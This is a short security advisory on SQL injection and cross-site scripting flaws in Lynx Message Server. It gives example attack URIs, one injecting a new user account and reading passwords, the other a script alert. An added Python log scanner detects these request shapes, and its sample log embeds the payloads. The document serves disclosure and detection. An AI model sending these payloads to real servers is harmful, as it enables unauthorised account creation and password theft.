Lynx Message Server SQL Injection and Cross Site Scripting Vulnerabilities

An attacker can exploit these issues with a browser. To exploit cross-site scripting issues, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available.

SQL injection:

http://www.example.com/cgi/email_password.plx?UserID=a'%3BINSERT+INTO+Users([User],[Password])+VALUES+('bede','bede')%3Bselect+Users.[Password],+Users.[User]+from+USERS+where+Users.[User]='b

Cross-site scripting:

http://www.example.com/cgi/wrapper.plx?Destination=addequipment.htm&Title=<script>alert('XSS')</script>
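For defenders, the two request shapes above can be looked for in web server access logs. The following is an added detection example, not part of the original advisory: the log format, client addresses and regex heuristics are assumptions, and the sample log is constructed around the advisory's example URIs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed heuristics for the two request shapes in the advisory: a quote
# followed by a stacked statement, and HTML markup inside a query parameter.
SQLI = re.compile(r"'\s*;|;\s*(?:insert|update|delete|drop|select)\b", re.I)
MARKUP = re.compile(r"<\s*/?\s*[a-z]", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(uri):
    """Return [(path, parameter, finding), ...] for one request URI."""
    parts = urlsplit(uri)
    findings = []
    # parse_qs percent-decodes and maps '+' to a space, so encoded payloads
    # are matched in the form the application would receive them.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SQLI.search(value):
                findings.append((parts.path, name, "sqli"))
            if MARKUP.search(value):
                findings.append((parts.path, name, "xss"))
    return findings

def scan(log_lines):
    """Return [(client, path, parameter, finding), ...] across access-log lines."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        hits.extend((client, *f) for f in classify(m.group(1)))
    return hits

# Constructed sample log: documentation addresses, common log format assumed.
# The first line is a benign value containing a quote and must not be flagged.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cgi/email_password.plx?UserID=o'brien HTTP/1.1" 200 512
192.0.2.20 - - [01/Jan/2010:10:00:05 +0000] "GET /cgi/email_password.plx?UserID=a'%3BINSERT+INTO+Users([User],[Password])+VALUES+('bede','bede')%3Bselect+Users.[Password],+Users.[User]+from+USERS+where+Users.[User]='b HTTP/1.1" 200 512
192.0.2.30 - - [01/Jan/2010:10:00:09 +0000] "GET /cgi/wrapper.plx?Destination=addequipment.htm&Title=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1" 200 2048
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Pattern matching of this kind only surfaces requests for review; the fix belongs in the application, which should bind UserID as a query parameter and HTML-encode Title on output.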


 

Copyright 2010, SecurityFocus